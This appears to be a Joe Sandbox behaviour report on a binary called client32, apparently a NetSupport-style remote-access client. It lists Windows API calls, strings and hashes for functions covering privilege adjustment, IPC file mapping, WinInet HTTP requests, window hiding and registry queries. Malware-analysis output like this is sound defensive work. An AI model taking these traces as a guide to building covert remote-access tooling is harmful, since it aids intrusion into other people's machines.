67802->67800 67806 11061f31 67803->67806 67841 11061e11 std::ios_base::_Tidy 67804->67841 67805 11061dc7 67807 11061dce 67805->67807 67821 11061e1d _strpbrk std::locale::_Init 67805->67821 67809 11061f97 _strpbrk 67806->67809 67810 11061f38 67806->67810 67941 11163676 67809->67941 67811 11061f7d 67810->67811 67816 11163db7 std::locale::_Init 102 API calls 67810->67816 67817 110d07c0 266 API calls 67811->67817 67815 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 67819 11062cbf 67815->67819 67816->67811 67817->67841 67841->67815 67916 11144eb3 std::ios_base::_Tidy 67913->67916 67914 11144dc0 268 API calls 67914->67916 67916->67914 67917 11144f1a std::ios_base::_Tidy 67916->67917 67918 11144ed5 GetLastError 67916->67918 68012 11163fed 67916->68012 67917->67795 67918->67916 67919 11144ee0 Sleep 67918->67919 67920 11163fed std::locale::_Init 142 API calls 67919->67920 67921 11144ef2 67920->67921 67921->67916 67921->67917 67924 111644a9 _raise 67922->67924 67923 111644bc 68376 111692ef 66 API calls __getptd_noexit 67923->68376 67924->67923 67925 111644ed 67924->67925 67927 111644f2 __lock_file 67925->67927 67933 111644cc _raise 67925->67933 67929 11164506 67927->67929 67940 11164571 67927->67940 67928 111644c1 68377 1116df04 11 API calls _raise 67928->68377 68378 11169287 67929->68378 67933->67805 67935 1116459e 67940->67935 68356 11171a25 67940->68356 67942 1116368f 67941->67942 68015 11163f31 68012->68015 68014 11163fff 68014->67916 68017 11163f3d _raise 68015->68017 68016 11163f50 68072 111692ef 66 API calls __getptd_noexit 68016->68072 68017->68016 68019 11163f7d 68017->68019 68034 111716f8 68019->68034 68020 11163f55 68073 1116df04 11 API calls _raise 68020->68073 68030 11163f60 _raise @_EH4_CallFilterFunc@8 68030->68014 68035 11171704 _raise 68034->68035 68036 1117373c __lock 66 API calls 68035->68036 68048 11171712 68036->68048 68037 11171787 68077 11171822 68037->68077 68038 1117178e 68040 11169d79 
__malloc_crt 66 API calls 68038->68040 68046 1117367a __mtinitlocknum 66 API calls 68046->68048 68048->68037 68048->68038 68048->68046 68080 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 68048->68080 68072->68020 68073->68030 68080->68048 68357 11171a32 68356->68357 68360 11171a47 68356->68360 68376->67928 68377->67933 68523 11060e40 68519->68523 68534 11060760 68523->68534 68527 11060e9c 68535 1110f420 std::locale::_Init 266 API calls 68534->68535 68536 1106077c 68535->68536 68537 110607c5 68536->68537 68538 11060783 68536->68538 68591 1116219a 66 API calls std::exception::_Copy_str 68537->68591 68584 1105e300 68538->68584 68541 110607bb 68545 110607f0 68541->68545 68542 110607d4 68592 111625f1 RaiseException 68542->68592 68544 110607e9 68546 11060b05 68545->68546 68549 11060825 68545->68549 68546->68527 68550 11060984 68549->68550 68551 110608d1 RegEnumValueA 68549->68551 68552 11060859 RegQueryInfoKeyA 68549->68552 68565 11060905 68551->68565 68585 1105e311 LeaveCriticalSection 68584->68585 68586 1105e31b 68584->68586 68585->68586 68587 1105e32f 68586->68587 68588 11162be5 _free 66 API calls 68586->68588 68589 1105e375 68587->68589 68590 1105e339 EnterCriticalSection 68587->68590 68588->68587 68589->68541 68590->68541 68591->68542 68592->68544 69600->67519 69601->67522 69602->67526 69603->67551 69655 110805f0 69604->69655 69609 1102d54a 69613 110eb080 69609->69613 69610 110affe7 69667 11029450 266 API calls 2 library calls 69610->69667 69614 110affa0 268 API calls 69613->69614 69615 110eb0ad 69614->69615 69683 110ea450 69615->69683 69617 110eb0f1 69693 110b0190 268 API calls std::locale::_Init 69617->69693 69619 1102d555 69625 110b0190 268 API calls std::locale::_Init 69619->69625 69620->67547 69621->67542 69622->67548 69623->67552 69624->67554 69625->67577 69626->67583 69627->67567 69628->67567 69629->67576 69631->67589 69632->67592 69633->67578 69635->67622 69636->67657 69637->67657 69638->67634 69639->67658 69641 1108a5aa std::ios_base::_Tidy 
69640->69641 69642 1108a617 69640->69642 69641->69642 69644 1108a5be CloseHandle 69641->69644 69643 1108a61e DeleteCriticalSection 69642->69643 69696 1106e1b0 69643->69696 69644->69641 69646 1108a644 std::ios_base::_Tidy 69646->67646 69647->67660 69648->67660 69649->67666 69650->67594 69651->67600 69653->67638 69654->67615 69656 11080614 69655->69656 69657 11080618 69656->69657 69658 1108062f 69656->69658 69668 11029450 266 API calls 2 library calls 69657->69668 69660 11080648 69658->69660 69661 1108062c 69658->69661 69664 110aff90 69660->69664 69661->69658 69669 11029450 266 API calls 2 library calls 69661->69669 69670 110812d0 69664->69670 69671 110812f1 69670->69671 69672 1108131d 69670->69672 69671->69672 69673 1108130b 69671->69673 69675 1108136a wsprintfA 69672->69675 69676 11081345 wsprintfA 69672->69676 69674 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69673->69674 69677 11081319 69674->69677 69682 11029450 266 API calls 2 library calls 69675->69682 69676->69672 69677->69609 69677->69610 69685 110ea45b 69683->69685 69684 110ea4f5 69684->69617 69685->69684 69686 110ea47e 69685->69686 69687 110ea495 69685->69687 69694 11029450 266 API calls 2 library calls 69686->69694 69689 110ea492 69687->69689 69690 110ea4c2 SendMessageTimeoutA 69687->69690 69689->69687 69695 11029450 266 API calls 2 library calls 69689->69695 69690->69684 69693->69619 69699 1106e1c4 69696->69699 69697 1106e1c8 69697->69646 69699->69697 69700 1106d9a0 67 API calls 2 library calls 69699->69700 69700->69699 69715 11022aa0 69716 11022aba 69715->69716 69717 11022bad 69715->69717 69720 11022ac0 69716->69720 69721 11022b97 69716->69721 69718 11022c07 69717->69718 69719 11022bb5 69717->69719 69726 11022b31 69718->69726 69754 11022a70 414 API calls _free 69718->69754 69723 11022bb7 69719->69723 69724 11022bfc 69719->69724 69725 11022b83 69720->69725 69720->69726 69727 11022ada 69720->69727 69728 11022afa 69720->69728 69752 1101e8f0 

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109D46D
                                                                                                                                                                  • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                                                                                  • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                                                                                  • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109E225
                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E33D
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E390
                                                                                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                                                                                                  • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                                                                                                  • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                                                                                                • _memset.LIBCMT ref: 1109E500
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1109E508
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E624
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E669
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,59FD48C0,757323A0,?,00000000), ref: 110295C5
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                                                                                                • _malloc.LIBCMT ref: 11029697
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110296D2
                                                                                                                                                                • _free.LIBCMT ref: 110296DE
                                                                                                                                                                • _malloc.LIBCMT ref: 110296E7
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                                                                                                • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                                                                                                • _free.LIBCMT ref: 11029785
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                                                                                                • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,02FBB818,000000FF,?), ref: 11144ED5
                                                                                                                                                                  • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02FBB818,000000FF,?), ref: 11144EE5
                                                                                                                                                                • _fgets.LIBCMT ref: 11061DC2
                                                                                                                                                                • _strpbrk.LIBCMT ref: 11061E29
                                                                                                                                                                • _fgets.LIBCMT ref: 11061F2C
                                                                                                                                                                • _strpbrk.LIBCMT ref: 11061FA3
                                                                                                                                                                • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                                                                                                • _fgets.LIBCMT ref: 11062035
                                                                                                                                                                • _strpbrk.LIBCMT ref: 1106205B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start

                                                                                                                                                                Control-flow Graph (entry block 11143570-111435b1; nodes marked Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 111435A3
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                                                                                                • IsWindow.USER32(000802A6), ref: 11139125
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139133
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 1113916B
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 11139186
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 111391A0
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 111391BC
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139248
                                                                                                                                                                • IsIconic.USER32(000802A6), ref: 11139255
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 1113925F
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 11139294
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11139353
                                                                                                                                                                • GetLastError.KERNEL32 ref: 111393CB
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11139678
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11139699
                                                                                                                                                                  • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                                                                                • API String ID: 2511061093-2542869446
                                                                                                                                                                • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                                                                                • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                                                                                                • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                                                                                • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                • _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76968400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                                                                                • _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                • API String ID: 3299820421-2117887902
                                                                                                                                                                • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                                                                                • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                                                                                                • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                                                                                • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                                                                                                • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                                                                                                • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                • API String ID: 4195908086-2348320231
                                                                                                                                                                • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                                                                                • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                                                                                                • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                                                                                • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset
                                                                                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                                • API String ID: 2102423945-35127696
                                                                                                                                                                • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                                                                                • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                                                                                                • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                                                                                • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                                • API String ID: 3192549508-611217420
                                                                                                                                                                • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                                                                                                • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                                                                                                • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                                                                                                • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
